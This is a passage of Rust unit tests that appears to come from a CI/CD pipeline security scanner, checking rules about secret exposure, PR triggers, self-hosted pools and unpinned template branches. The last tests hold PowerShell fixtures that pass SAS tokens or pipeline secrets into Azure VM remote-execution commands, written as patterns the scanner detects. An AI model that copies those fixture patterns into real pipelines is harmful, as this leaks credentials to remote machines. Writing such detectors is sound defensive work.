7536        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
7537        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7538
7539        let findings = trigger_context_mismatch(&g);
7540        assert_eq!(findings.len(), 1);
7541        assert_eq!(findings[0].severity, Severity::High);
7542        assert_eq!(
7543            findings[0].category,
7544            FindingCategory::TriggerContextMismatch
7545        );
7546    }
7547
7548    #[test]
7549    fn cross_workflow_authority_chain_third_party_is_high() {
7550        let mut g = AuthorityGraph::new(source("ci.yml"));
7551        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7552        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7553        // ThirdParty target (SHA-pinned external workflow)
7554        let external = g.add_node(
7555            NodeKind::Image,
7556            "org/repo/.github/workflows/deploy.yml@a5ac7e51b41094c92402da3b24376905380afc29",
7557            TrustZone::ThirdParty,
7558        );
7559        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7560        g.add_edge(step, external, EdgeKind::DelegatesTo);
7561
7562        let findings = cross_workflow_authority_chain(&g);
7563        assert_eq!(findings.len(), 1);
7564        assert_eq!(
7565            findings[0].severity,
7566            Severity::High,
7567            "ThirdParty delegation target should be High (Critical reserved for Untrusted)"
7568        );
7569        assert_eq!(
7570            findings[0].category,
7571            FindingCategory::CrossWorkflowAuthorityChain
7572        );
7573    }
7574
7575    #[test]
7576    fn self_mutating_pipeline_first_party_no_authority_is_medium() {
7577        let mut g = AuthorityGraph::new(source("ci.yml"));
7578        let mut meta = std::collections::HashMap::new();
7579        meta.insert(META_WRITES_ENV_GATE.into(), "true".into());
7580        // FirstParty step writes the gate but holds no secret/identity access.
7581        g.add_node_with_metadata(NodeKind::Step, "set-version", TrustZone::FirstParty, meta);
7582
7583        let findings = self_mutating_pipeline(&g);
7584        assert_eq!(findings.len(), 1);
7585        assert_eq!(findings[0].severity, Severity::Medium);
7586        assert_eq!(findings[0].category, FindingCategory::SelfMutatingPipeline);
7587    }
7588
7589    #[test]
7590    fn authority_cycle_3node_cycle_includes_all_members() {
7591        // A → B → C → A should produce one finding whose nodes_involved
7592        // contains all three node IDs, not just the back-edge endpoints.
7593        let mut g = AuthorityGraph::new(source("test.yml"));
7594        let a = g.add_node(NodeKind::Step, "A", TrustZone::FirstParty);
7595        let b = g.add_node(NodeKind::Step, "B", TrustZone::FirstParty);
7596        let c = g.add_node(NodeKind::Step, "C", TrustZone::FirstParty);
7597        g.add_edge(a, b, EdgeKind::DelegatesTo);
7598        g.add_edge(b, c, EdgeKind::DelegatesTo);
7599        g.add_edge(c, a, EdgeKind::DelegatesTo);
7600
7601        let findings = authority_cycle(&g);
7602        assert_eq!(findings.len(), 1);
7603        assert_eq!(findings[0].category, FindingCategory::AuthorityCycle);
7604        assert!(
7605            findings[0].nodes_involved.contains(&a),
7606            "A must be in nodes_involved"
7607        );
7608        assert!(
7609            findings[0].nodes_involved.contains(&b),
7610            "B must be in nodes_involved — middle of A→B→C→A cycle"
7611        );
7612        assert!(
7613            findings[0].nodes_involved.contains(&c),
7614            "C must be in nodes_involved"
7615        );
7616    }
7617
7618    #[test]
7619    fn variable_group_in_pr_job_fires_on_pr_trigger_with_var_group() {
7620        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7621        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7622        let mut secret_meta = std::collections::HashMap::new();
7623        secret_meta.insert(META_VARIABLE_GROUP.into(), "true".into());
7624        let secret = g.add_node_with_metadata(
7625            NodeKind::Secret,
7626            "prod-deploy-secrets",
7627            TrustZone::FirstParty,
7628            secret_meta,
7629        );
7630        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7631        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7632
7633        let findings = variable_group_in_pr_job(&g);
7634        assert_eq!(findings.len(), 1);
7635        assert_eq!(findings[0].severity, Severity::Critical);
7636        assert_eq!(findings[0].category, FindingCategory::VariableGroupInPrJob);
7637        assert!(findings[0].message.contains("prod-deploy-secrets"));
7638    }
7639
7640    #[test]
7641    fn variable_group_in_pr_job_no_fire_without_pr_trigger() {
7642        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7643        // No trigger metadata — should not fire
7644        let mut secret_meta = std::collections::HashMap::new();
7645        secret_meta.insert(META_VARIABLE_GROUP.into(), "true".into());
7646        let secret = g.add_node_with_metadata(
7647            NodeKind::Secret,
7648            "prod-deploy-secrets",
7649            TrustZone::FirstParty,
7650            secret_meta,
7651        );
7652        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7653        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7654
7655        let findings = variable_group_in_pr_job(&g);
7656        assert!(
7657            findings.is_empty(),
7658            "no PR trigger → variable_group_in_pr_job must not fire"
7659        );
7660    }
7661
7662    #[test]
7663    fn variable_group_in_pr_job_no_fire_when_pr_none() {
7664        // Regression for Bug 1: pr: none in ADO means no PR trigger — the parser
7665        // must not set META_TRIGGER, so variable_group_in_pr_job must not fire.
7666        // This test validates at the rule level: no META_TRIGGER → no firing.
7667        let mut g = AuthorityGraph::new(source("weekly-report.yml"));
7668        // No META_TRIGGER inserted — mirrors what the parser produces for pr: none.
7669        let mut secret_meta = std::collections::HashMap::new();
7670        secret_meta.insert(META_VARIABLE_GROUP.into(), "true".into());
7671        let secret = g.add_node_with_metadata(
7672            NodeKind::Secret,
7673            "ado-report-secrets",
7674            TrustZone::FirstParty,
7675            secret_meta,
7676        );
7677        let step = g.add_node(NodeKind::Step, "report-step", TrustZone::FirstParty);
7678        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7679
7680        let findings = variable_group_in_pr_job(&g);
7681        assert!(
7682            findings.is_empty(),
7683            "pr: none (no META_TRIGGER) → variable_group_in_pr_job must not fire; got: {findings:#?}"
7684        );
7685    }
7686
7687    #[test]
7688    fn self_hosted_pool_pr_hijack_fires_when_all_three_factors_present() {
7689        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7690        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7691
7692        let mut pool_meta = std::collections::HashMap::new();
7693        pool_meta.insert(META_SELF_HOSTED.into(), "true".into());
7694        g.add_node_with_metadata(
7695            NodeKind::Image,
7696            "self-hosted-pool",
7697            TrustZone::FirstParty,
7698            pool_meta,
7699        );
7700
7701        let mut step_meta = std::collections::HashMap::new();
7702        step_meta.insert(META_CHECKOUT_SELF.into(), "true".into());
7703        g.add_node_with_metadata(NodeKind::Step, "checkout", TrustZone::FirstParty, step_meta);
7704
7705        let findings = self_hosted_pool_pr_hijack(&g);
7706        assert_eq!(findings.len(), 1);
7707        assert_eq!(findings[0].severity, Severity::Critical);
7708        assert_eq!(
7709            findings[0].category,
7710            FindingCategory::SelfHostedPoolPrHijack
7711        );
7712        assert!(findings[0].message.contains("self-hosted"));
7713    }
7714
7715    #[test]
7716    fn self_hosted_pool_pr_hijack_no_fire_without_pr_trigger() {
7717        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7718        // No trigger metadata
7719
7720        let mut pool_meta = std::collections::HashMap::new();
7721        pool_meta.insert(META_SELF_HOSTED.into(), "true".into());
7722        g.add_node_with_metadata(
7723            NodeKind::Image,
7724            "self-hosted-pool",
7725            TrustZone::FirstParty,
7726            pool_meta,
7727        );
7728
7729        let mut step_meta = std::collections::HashMap::new();
7730        step_meta.insert(META_CHECKOUT_SELF.into(), "true".into());
7731        g.add_node_with_metadata(NodeKind::Step, "checkout", TrustZone::FirstParty, step_meta);
7732
7733        let findings = self_hosted_pool_pr_hijack(&g);
7734        assert!(
7735            findings.is_empty(),
7736            "no PR trigger → self_hosted_pool_pr_hijack must not fire"
7737        );
7738    }
7739
7740    #[test]
7741    fn service_connection_scope_mismatch_fires_on_pr_broad_non_oidc() {
7742        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7743        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7744
7745        let mut sc_meta = std::collections::HashMap::new();
7746        sc_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
7747        sc_meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
7748        // No META_OIDC → treated as not OIDC-federated
7749        let sc = g.add_node_with_metadata(
7750            NodeKind::Identity,
7751            "prod-azure-sc",
7752            TrustZone::FirstParty,
7753            sc_meta,
7754        );
7755        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7756        g.add_edge(step, sc, EdgeKind::HasAccessTo);
7757
7758        let findings = service_connection_scope_mismatch(&g);
7759        assert_eq!(findings.len(), 1);
7760        assert_eq!(findings[0].severity, Severity::High);
7761        assert_eq!(
7762            findings[0].category,
7763            FindingCategory::ServiceConnectionScopeMismatch
7764        );
7765        assert!(findings[0].message.contains("prod-azure-sc"));
7766    }
7767
7768    #[test]
7769    fn service_connection_scope_mismatch_no_fire_without_pr_trigger() {
7770        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7771        // No trigger metadata
7772        let mut sc_meta = std::collections::HashMap::new();
7773        sc_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
7774        sc_meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
7775        let sc = g.add_node_with_metadata(
7776            NodeKind::Identity,
7777            "prod-azure-sc",
7778            TrustZone::FirstParty,
7779            sc_meta,
7780        );
7781        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7782        g.add_edge(step, sc, EdgeKind::HasAccessTo);
7783
7784        let findings = service_connection_scope_mismatch(&g);
7785        assert!(
7786            findings.is_empty(),
7787            "no PR trigger → service_connection_scope_mismatch must not fire"
7788        );
7789    }
7790
7791    #[test]
7792    fn checkout_self_pr_exposure_fires_on_pr_trigger() {
7793        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7794        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7795        let mut step_meta = std::collections::HashMap::new();
7796        step_meta.insert(META_CHECKOUT_SELF.into(), "true".into());
7797        g.add_node_with_metadata(NodeKind::Step, "checkout", TrustZone::FirstParty, step_meta);
7798
7799        let findings = checkout_self_pr_exposure(&g);
7800        assert_eq!(findings.len(), 1);
7801        assert_eq!(
7802            findings[0].category,
7803            FindingCategory::CheckoutSelfPrExposure
7804        );
7805        assert_eq!(findings[0].severity, Severity::High);
7806    }
7807
7808    #[test]
7809    fn checkout_self_pr_exposure_no_fire_without_pr_trigger() {
7810        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7811        // No META_TRIGGER set
7812        let mut step_meta = std::collections::HashMap::new();
7813        step_meta.insert(META_CHECKOUT_SELF.into(), "true".into());
7814        g.add_node_with_metadata(NodeKind::Step, "checkout", TrustZone::FirstParty, step_meta);
7815
7816        let findings = checkout_self_pr_exposure(&g);
7817        assert!(
7818            findings.is_empty(),
7819            "no PR trigger → checkout_self_pr_exposure must not fire"
7820        );
7821    }
7822
7823    #[test]
7824    fn variable_group_in_pr_job_uses_cellos_remediation() {
7825        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7826        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7827
7828        let mut secret_meta = std::collections::HashMap::new();
7829        secret_meta.insert(META_VARIABLE_GROUP.into(), "true".into());
7830        let secret = g.add_node_with_metadata(
7831            NodeKind::Secret,
7832            "prod-secret",
7833            TrustZone::FirstParty,
7834            secret_meta,
7835        );
7836        let step = g.add_node(NodeKind::Step, "deploy step", TrustZone::Untrusted);
7837        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7838
7839        let findings = variable_group_in_pr_job(&g);
7840        assert!(!findings.is_empty());
7841        assert!(
7842            matches!(
7843                findings[0].recommendation,
7844                Recommendation::CellosRemediation { .. }
7845            ),
7846            "variable_group_in_pr_job must recommend CellosRemediation"
7847        );
7848    }
7849
7850    #[test]
7851    fn service_connection_scope_mismatch_uses_cellos_remediation() {
7852        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7853        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7854
7855        let mut id_meta = std::collections::HashMap::new();
7856        id_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
7857        id_meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
7858        // No META_OIDC → treated as not OIDC-federated
7859        let identity = g.add_node_with_metadata(
7860            NodeKind::Identity,
7861            "sub-conn",
7862            TrustZone::FirstParty,
7863            id_meta,
7864        );
7865        let step = g.add_node(NodeKind::Step, "azure deploy", TrustZone::Untrusted);
7866        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7867
7868        let findings = service_connection_scope_mismatch(&g);
7869        assert!(!findings.is_empty());
7870        assert!(
7871            matches!(
7872                findings[0].recommendation,
7873                Recommendation::CellosRemediation { .. }
7874            ),
7875            "service_connection_scope_mismatch must recommend CellosRemediation"
7876        );
7877    }
7878
7879    /// Build a propagation graph with an optional approval-gated middle step:
7880    ///   Secret → middle Step (FirstParty) → Artifact → ThirdParty Step.
7881    /// When `gated` is true the middle step carries META_ENV_APPROVAL.
7882    fn build_env_approval_graph(gated: bool) -> AuthorityGraph {
7883        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7884
7885        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7886        let mut middle_meta = std::collections::HashMap::new();
7887        if gated {
7888            middle_meta.insert(META_ENV_APPROVAL.into(), "true".into());
7889        }
7890        let middle = g.add_node_with_metadata(
7891            NodeKind::Step,
7892            "deploy-prod",
7893            TrustZone::FirstParty,
7894            middle_meta,
7895        );
7896        let artifact = g.add_node(NodeKind::Artifact, "release.tar", TrustZone::FirstParty);
7897        let third = g.add_node(
7898            NodeKind::Step,
7899            "third-party/uploader",
7900            TrustZone::ThirdParty,
7901        );
7902
7903        g.add_edge(middle, secret, EdgeKind::HasAccessTo);
7904        g.add_edge(middle, artifact, EdgeKind::Produces);
7905        g.add_edge(artifact, third, EdgeKind::Consumes);
7906
7907        g
7908    }
7909
7910    #[test]
7911    fn env_approval_gate_reduces_propagation_severity() {
7912        // Baseline: no gate → Critical (third-party sink, not SHA-pinned)
7913        let baseline = authority_propagation(&build_env_approval_graph(false), 4);
7914        let baseline_finding = baseline
7915            .iter()
7916            .find(|f| f.category == FindingCategory::AuthorityPropagation)
7917            .expect("baseline must produce an AuthorityPropagation finding");
7918        assert_eq!(baseline_finding.severity, Severity::Critical);
7919        assert!(!baseline_finding
7920            .message
7921            .contains("environment approval gate"));
7922
7923        // Gated: same shape, middle step tagged → severity drops one step to High
7924        let gated = authority_propagation(&build_env_approval_graph(true), 4);
7925        let gated_finding = gated
7926            .iter()
7927            .find(|f| f.category == FindingCategory::AuthorityPropagation)
7928            .expect("gated must produce an AuthorityPropagation finding");
7929        assert_eq!(
7930            gated_finding.severity,
7931            Severity::High,
7932            "Critical must downgrade to High when path crosses an env-approval gate"
7933        );
7934        assert!(
7935            gated_finding
7936                .message
7937                .contains("(mitigated: environment approval gate)"),
7938            "gated finding must annotate the mitigation in its message"
7939        );
7940    }
7941
7942    #[test]
7943    fn downgrade_one_step_table() {
7944        assert_eq!(downgrade_one_step(Severity::Critical), Severity::High);
7945        assert_eq!(downgrade_one_step(Severity::High), Severity::Medium);
7946        assert_eq!(downgrade_one_step(Severity::Medium), Severity::Low);
7947        assert_eq!(downgrade_one_step(Severity::Low), Severity::Low);
7948        assert_eq!(downgrade_one_step(Severity::Info), Severity::Info);
7949    }
7950
7951    // ── template_extends_unpinned_branch ──────────────────────
7952
7953    /// Build a graph whose META_REPOSITORIES carries a single repo descriptor.
7954    /// `git_ref` of `None` encodes the "no `ref:` field" case (default branch).
7955    fn graph_with_repo(
7956        alias: &str,
7957        repo_type: &str,
7958        name: &str,
7959        git_ref: Option<&str>,
7960        used: bool,
7961    ) -> AuthorityGraph {
7962        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7963        let mut obj = serde_json::Map::new();
7964        obj.insert("alias".into(), serde_json::Value::String(alias.into()));
7965        obj.insert(
7966            "repo_type".into(),
7967            serde_json::Value::String(repo_type.into()),
7968        );
7969        obj.insert("name".into(), serde_json::Value::String(name.into()));
7970        if let Some(r) = git_ref {
7971            obj.insert("ref".into(), serde_json::Value::String(r.into()));
7972        }
7973        obj.insert("used".into(), serde_json::Value::Bool(used));
7974        let arr = serde_json::Value::Array(vec![serde_json::Value::Object(obj)]);
7975        g.metadata.insert(
7976            META_REPOSITORIES.into(),
7977            serde_json::to_string(&arr).unwrap(),
7978        );
7979        g
7980    }
7981
7982    // ── vm_remote_exec_via_pipeline_secret ──────────────
7983
7984    /// Helper: build a graph with one Step that has the given inline script
7985    /// body and (optionally) a HasAccessTo edge to a Secret named `sas_var`.
7986    fn graph_with_script_step(body: &str, secret_name: Option<&str>) -> AuthorityGraph {
7987        let mut g = AuthorityGraph::new(source("ado.yml"));
7988        let mut meta = std::collections::HashMap::new();
7989        meta.insert(META_SCRIPT_BODY.into(), body.into());
7990        let step_id =
7991            g.add_node_with_metadata(NodeKind::Step, "deploy-vm", TrustZone::FirstParty, meta);
7992        if let Some(name) = secret_name {
7993            let sec = g.add_node(NodeKind::Secret, name, TrustZone::FirstParty);
7994            g.add_edge(step_id, sec, EdgeKind::HasAccessTo);
7995        }
7996        g
7997    }
7998
7999    // ── secret_to_inline_script_env_export ────────────────────
8000
8001    /// Build a graph with one Step that has access to `secret_name` and
8002    /// stamps `script` as the META_SCRIPT_BODY.
8003    fn build_step_with_script(secret_name: &str, script: &str) -> AuthorityGraph {
8004        let mut g = AuthorityGraph::new(source("ado.yml"));
8005        let secret = g.add_node(NodeKind::Secret, secret_name, TrustZone::FirstParty);
8006        let mut meta = std::collections::HashMap::new();
8007        meta.insert(META_SCRIPT_BODY.into(), script.into());
8008        let step = g.add_node_with_metadata(NodeKind::Step, "deploy", TrustZone::FirstParty, meta);
8009        g.add_edge(step, secret, EdgeKind::HasAccessTo);
8010        g
8011    }
8012
8013    #[test]
8014    fn template_extends_unpinned_branch_fires_on_missing_ref() {
8015        let g = graph_with_repo(
8016            "template-library",
8017            "git",
8018            "Template Library/Library",
8019            None,
8020            true,
8021        );
8022        let findings = template_extends_unpinned_branch(&g);
8023        assert_eq!(findings.len(), 1);
8024        assert_eq!(
8025            findings[0].category,
8026            FindingCategory::TemplateExtendsUnpinnedBranch
8027        );
8028        assert_eq!(findings[0].severity, Severity::High);
8029        assert!(findings[0].message.contains("default branch"));
8030    }
8031
8032    #[test]
8033    fn template_extends_unpinned_branch_fires_on_refs_heads_main() {
8034        let g = graph_with_repo(
8035            "templates",
8036            "git",
8037            "org/templates",
8038            Some("refs/heads/main"),
8039            true,
8040        );
8041        let findings = template_extends_unpinned_branch(&g);
8042        assert_eq!(findings.len(), 1);
8043        assert!(findings[0].message.contains("mutable branch 'main'"));
8044    }
8045
8046    #[test]
8047    fn template_extends_unpinned_branch_skips_tag_pinned() {
8048        let g = graph_with_repo(
8049            "templates",
8050            "github",
8051            "org/templates",
8052            Some("refs/tags/v1.0.0"),
8053            true,
8054        );
8055        let findings = template_extends_unpinned_branch(&g);
8056        assert!(
8057            findings.is_empty(),
8058            "refs/tags/v1.0.0 must be treated as pinned"
8059        );
8060    }
8061
8062    #[test]
8063    fn template_extends_unpinned_branch_skips_sha_pinned() {
8064        let sha = "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0";
8065        assert_eq!(sha.len(), 40);
8066        let g = graph_with_repo("templates", "git", "org/templates", Some(sha), true);
8067        let findings = template_extends_unpinned_branch(&g);
8068        assert!(
8069            findings.is_empty(),
8070            "40-char hex SHA must be treated as pinned"
8071        );
8072    }
8073
8074    #[test]
8075    fn template_extends_unpinned_branch_skips_unreferenced_repo_with_no_ref() {
8076        // Spec edge: "repo declared but not referenced anywhere → does not fire
8077        // (no consumer = no risk)". Applies when the declaration carries no
8078        // explicit `ref:` field — the entry is purely vestigial in that case.
8079        let g = graph_with_repo(
8080            "templates",
8081            "git",
8082            "org/templates",
8083            None,  // no explicit ref
8084            false, // and no consumer
8085        );
8086        let findings = template_extends_unpinned_branch(&g);
8087        assert!(
8088            findings.is_empty(),
8089            "repo declared with no ref and no consumer must not fire"
8090        );
8091    }
8092
8093    #[test]
8094    fn template_extends_unpinned_branch_fires_on_explicit_branch_even_without_in_file_consumer() {
8095        // An explicit `ref: refs/heads/<branch>` signals intent to consume —
8096        // the consumer is typically inside an included template file outside
8097        // the per-file scan boundary (mirrors the msigeurope corpus shape).
8098        let g = graph_with_repo(
8099            "adf_publish",
8100            "git",
8101            "org/finance-reporting",
8102            Some("refs/heads/adf_publish"),
8103            false, // no in-file consumer
8104        );
8105        let findings = template_extends_unpinned_branch(&g);
8106        assert_eq!(findings.len(), 1);
8107        assert!(findings[0].message.contains("mutable branch 'adf_publish'"));
8108    }
8109
8110    #[test]
8111    fn template_extends_unpinned_branch_skips_when_metadata_absent() {
8112        let g = AuthorityGraph::new(source("ci.yml"));
8113        assert!(template_extends_unpinned_branch(&g).is_empty());
8114    }
8115
8116    #[test]
8117    fn template_extends_unpinned_branch_handles_bare_branch_name() {
8118        // `ref: main` (no `refs/heads/` prefix) is a valid ADO shorthand for a branch.
8119        let g = graph_with_repo(
8120            "template-library",
8121            "git",
8122            "Template Library/Library",
8123            Some("main"),
8124            true,
8125        );
8126        let findings = template_extends_unpinned_branch(&g);
8127        assert_eq!(findings.len(), 1);
8128        assert!(findings[0].message.contains("mutable branch 'main'"));
8129    }
8130
8131    // ── template_repo_ref_is_feature_branch ───────────────────
8132
8133    #[test]
8134    fn template_repo_ref_is_feature_branch_fires_on_bare_feature_branch() {
8135        // Mirrors the corpus shape: `ref: feature/maps-network` (no
8136        // `refs/heads/` prefix) on the Template Library checkout.
8137        let g = graph_with_repo(
8138            "templateLibRepo",
8139            "git",
8140            "Template Library/Template Library",
8141            Some("feature/maps-network"),
8142            true,
8143        );
8144        let findings = template_repo_ref_is_feature_branch(&g);
8145        assert_eq!(findings.len(), 1);
8146        assert_eq!(
8147            findings[0].category,
8148            FindingCategory::TemplateRepoRefIsFeatureBranch
8149        );
8150        assert_eq!(findings[0].severity, Severity::High);
8151        assert!(findings[0].message.contains("feature/maps-network"));
8152        assert!(findings[0].message.contains("feature-class"));
8153    }
8154
8155    #[test]
8156    fn template_repo_ref_is_feature_branch_fires_on_refs_heads_feature() {
8157        // Same attack via the fully-qualified `refs/heads/feature/...` form.
8158        let g = graph_with_repo(
8159            "templates",
8160            "git",
8161            "org/templates",
8162            Some("refs/heads/feature/wip"),
8163            true,
8164        );
8165        let findings = template_repo_ref_is_feature_branch(&g);
8166        assert_eq!(findings.len(), 1);
8167        assert!(findings[0].message.contains("feature/wip"));
8168    }
8169
8170    #[test]
8171    fn template_repo_ref_is_feature_branch_fires_on_develop_branch() {
8172        // `develop` is not in the trunk set — it's a feature-class branch.
8173        let g = graph_with_repo(
8174            "templates",
8175            "git",
8176            "org/templates",
8177            Some("refs/heads/develop"),
8178            true,
8179        );
8180        let findings = template_repo_ref_is_feature_branch(&g);
8181        assert_eq!(findings.len(), 1);
8182    }
8183
8184    #[test]
8185    fn template_repo_ref_is_feature_branch_skips_main_branch() {
8186        // `template_extends_unpinned_branch` still fires on this — but the
8187        // feature-branch refinement does not, because main is the trunk.
8188        let g = graph_with_repo(
8189            "templates",
8190            "git",
8191            "org/templates",
8192            Some("refs/heads/main"),
8193            true,
8194        );
8195        assert!(template_repo_ref_is_feature_branch(&g).is_empty());
8196        // Sanity: the parent rule still fires on the same input.
8197        assert_eq!(template_extends_unpinned_branch(&g).len(), 1);
8198    }
8199
8200    #[test]
8201    fn template_repo_ref_is_feature_branch_skips_master_release_hotfix() {
8202        for ref_value in [
8203            "master",
8204            "refs/heads/master",
8205            "release/v1.4",
8206            "refs/heads/release/2026-q2",
8207            "releases/2026-04",
8208            "hotfix/CVE-2026-0001",
8209            "refs/heads/hotfix/CVE-2026-0002",
8210        ] {
8211            let g = graph_with_repo("t", "git", "org/t", Some(ref_value), true);
8212            assert!(
8213                template_repo_ref_is_feature_branch(&g).is_empty(),
8214                "ref {ref_value:?} must not fire as feature-class"
8215            );
8216        }
8217    }
8218
8219    #[test]
8220    fn template_repo_ref_is_feature_branch_skips_pinned_refs() {
8221        // SHA, tag, and refs/heads/<sha> are all pinned — the feature-branch
8222        // rule must not fire on any of them, regardless of the alias name.
8223        let sha = "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0";
8224        for ref_value in [
8225            sha.to_string(),
8226            "refs/tags/v1.4.2".to_string(),
8227            format!("refs/heads/{sha}"),
8228        ] {
8229            let g = graph_with_repo("templates", "git", "org/t", Some(&ref_value), true);
8230            assert!(
8231                template_repo_ref_is_feature_branch(&g).is_empty(),
8232                "pinned ref {ref_value:?} must not fire"
8233            );
8234        }
8235    }
8236
8237    #[test]
8238    fn template_repo_ref_is_feature_branch_skips_when_ref_absent() {
8239        // The "no ref:" (default-branch) case is left to
8240        // `template_extends_unpinned_branch`. The feature-branch rule only
8241        // fires on explicit feature-class refs.
8242        let g = graph_with_repo("templates", "git", "org/templates", None, true);
8243        assert!(template_repo_ref_is_feature_branch(&g).is_empty());
8244    }
8245
8246    #[test]
8247    fn template_repo_ref_is_feature_branch_cofires_with_parent_rule() {
8248        // Both rules should fire together on the corpus shape — the parent
8249        // says "not pinned", the refinement says "and it's a feature branch".
8250        let g = graph_with_repo(
8251            "templateLibRepo",
8252            "git",
8253            "Template Library/Template Library",
8254            Some("feature/maps-network"),
8255            true,
8256        );
8257        let parent = template_extends_unpinned_branch(&g);
8258        let refinement = template_repo_ref_is_feature_branch(&g);
8259        assert_eq!(parent.len(), 1, "parent rule must still fire");
8260        assert_eq!(refinement.len(), 1, "refinement must fire alongside");
8261        assert_ne!(parent[0].category, refinement[0].category);
8262    }
8263
8264    #[test]
8265    fn is_feature_class_branch_classification() {
8266        // Trunk-class — must return false.
8267        for b in [
8268            "main",
8269            "MAIN",
8270            "master",
8271            "refs/heads/main",
8272            "release/v1",
8273            "release/",
8274            "release",
8275            "releases/2026",
8276            "hotfix/x",
8277            "hotfix",
8278            "hotfixes/y",
8279            "  refs/heads/main  ",
8280        ] {
8281            assert!(!is_feature_class_branch(b), "{b:?} must be trunk");
8282        }
8283        // Feature-class — must return true.
8284        for b in [
8285            "feature/foo",
8286            "topic/bar",
8287            "dev/wip",
8288            "wip/x",
8289            "develop",
8290            "users/alice/spike",
8291            "personal-branch",
8292            "refs/heads/feature/x",
8293            "main-staging", // not exact main, prefix-only — feature-class
8294        ] {
8295            assert!(is_feature_class_branch(b), "{b:?} must be feature-class");
8296        }
8297        // Empty / whitespace.
8298        assert!(!is_feature_class_branch(""));
8299        assert!(!is_feature_class_branch("   "));
8300    }
8301
8302    #[test]
8303    fn template_extends_unpinned_branch_skips_refs_heads_with_sha() {
8304        // ADO accepts `ref: refs/heads/<sha>` to lock onto a commit on a branch.
8305        // The trailing segment is what determines mutability.
8306        let sha = "0123456789abcdef0123456789abcdef01234567";
8307        let g = graph_with_repo(
8308            "templates",
8309            "git",
8310            "org/templates",
8311            Some(&format!("refs/heads/{sha}")),
8312            true,
8313        );
8314        let findings = template_extends_unpinned_branch(&g);
8315        assert!(findings.is_empty());
8316    }
8317
8318    // ── vm_remote_exec_via_pipeline_secret ──────────────
8319
8320    #[test]
8321    fn vm_remote_exec_fires_on_set_azvmextension_with_minted_sas() {
8322        let body = r#"
8323            $sastokenpackages = New-AzStorageContainerSASToken -Container $packagecontainer -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(3)
8324            Set-AzVMExtension -ResourceGroupName $vmRG -VMName $vm.name -Name 'customScript' `
8325                -Publisher 'Microsoft.Compute' -ExtensionType 'CustomScriptExtension' `
8326                -Settings @{ "commandToExecute" = "powershell -File install.ps1 -saskey `"$sastokenpackages`"" }
8327        "#;
8328        let g = graph_with_script_step(body, None);
8329        let findings = vm_remote_exec_via_pipeline_secret(&g);
8330        assert_eq!(findings.len(), 1, "should fire once");
8331        assert_eq!(
8332            findings[0].category,
8333            FindingCategory::VmRemoteExecViaPipelineSecret
8334        );
8335        assert_eq!(findings[0].severity, Severity::High);
8336    }
8337
8338    #[test]
8339    fn vm_remote_exec_fires_on_invoke_azvmruncommand_with_pipeline_secret() {
8340        let body = r#"
8341            Invoke-AzVMRunCommand -ResourceGroupName rg -VMName vm `
8342                -CommandId RunPowerShellScript -ScriptString "Add-LocalGroupMember -Member admin -Password $(DOMAIN_JOIN_PASSWORD)"
8343        "#;
8344        let g = graph_with_script_step(body, Some("DOMAIN_JOIN_PASSWORD"));
8345        let findings = vm_remote_exec_via_pipeline_secret(&g);
8346        assert_eq!(findings.len(), 1);
8347        assert!(findings[0]
8348            .message
8349            .contains("interpolating a pipeline secret"));
8350    }
8351
8352    #[test]
8353    fn vm_remote_exec_does_not_fire_without_remote_exec_call() {
8354        // Has a SAS mint, but no VM remote-exec primitive — should not fire.
8355        let body = r#"
8356            $sas = New-AzStorageContainerSASToken -Container c -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(1)
8357            Write-Host "sas length is $($sas.Length)"
8358        "#;
8359        let g = graph_with_script_step(body, None);
8360        let findings = vm_remote_exec_via_pipeline_secret(&g);
8361        assert!(findings.is_empty());
8362    }
8363
8364    #[test]
8365    fn vm_remote_exec_does_not_fire_when_remote_exec_has_no_secret_or_sas() {
8366        // Set-AzVMExtension with a static command line, no SAS, no secret —
8367        // should not fire (no exposed credential).
8368        let body = r#"
8369            Set-AzVMExtension -ResourceGroupName rg -VMName vm -Name diag `
8370                -Publisher Microsoft.Azure.Diagnostics -ExtensionType IaaSDiagnostics `
8371                -Settings @{ "xmlCfg" = "<wadcfg/>" }
